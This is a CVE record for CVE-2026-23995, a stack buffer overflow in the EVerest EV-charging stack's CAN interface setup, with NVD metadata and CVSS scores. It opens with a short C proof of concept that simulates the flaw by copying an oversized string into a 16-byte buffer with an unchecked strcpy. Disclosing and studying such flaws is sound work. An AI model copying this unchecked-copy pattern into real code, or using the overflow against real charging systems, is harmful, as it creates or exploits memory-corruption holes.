CVE-2026-23995

/* * PoC for CVE-2026-23995 * This script demonstrates the vulnerability by attempting to trigger * a buffer overflow with an interface name longer than IFNAMSIZ (16 bytes). */ #include <stdio.h> #include <string.h> #define IFNAMSIZ 16 // Simulated vulnerable function based on the description void vulnerable_can_init(const char *iface_name) { char ifr_name[IFNAMSIZ]; // Vulnerability: No length check before strcpy strcpy(ifr_name, iface_name); printf("Interface initialized: %s\n", ifr_name); } int main() { // Create a payload larger than 16 bytes char malicious_payload[32]; memset(malicious_payload, 'A', sizeof(malicious_payload) - 1); malicious_payload[sizeof(malicious_payload) - 1] = '\0'; printf("[+] Triggering buffer overflow with payload length: %zu\n", strlen(malicious_payload)); vulnerable_can_init(malicious_payload); return 0; }

{"cve": {"id": "CVE-2026-23995", "sourceIdentifier": "[email protected]", "published": "2026-03-26T15:16:32.137", "lastModified": "2026-03-31T13:49:39.677", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "EVerest is an EV charging software stack. Prior to version 2026.02.0, stack-based buffer overflow in CAN interface initialization: passing an interface name longer than IFNAMSIZ (16) to CAN open routines overflows `ifreq.ifr_name`, corrupting adjacent stack data and enabling potential code execution. A malicious or misconfigured interface name can trigger this before any privilege checks. Version 2026.02.0 contains a patch."}, {"lang": "es", "value": "EVerest es una pila de software de carga de VE. Antes de la versión 2026.02.0, desbordamiento de búfer basado en pila en la inicialización de la interfaz CAN: pasar un nombre de interfaz más largo que IFNAMSIZ (16) a las rutinas de apertura de CAN desborda 'ifreq.ifr_name', corrompiendo datos adyacentes de la pila y permitiendo la ejecución potencial de código. Un nombre de interfaz malicioso o mal configurado puede activar esto antes de cualquier verificación de privilegios. La versión 2026.02.0 contiene un parche."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linuxfoundation:everest:*:*:*:*:*:*:*:*", "versionEndExcluding": "2026.02.0", "matchCriteriaId": "EB167E67-6808-4F7B-9505-FFF0C02B288C"}]}]}], "references": [{"url": "https://github.com/EVerest/EVerest/security/advisories/GHSA-p47c-2jpr-mpwx", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}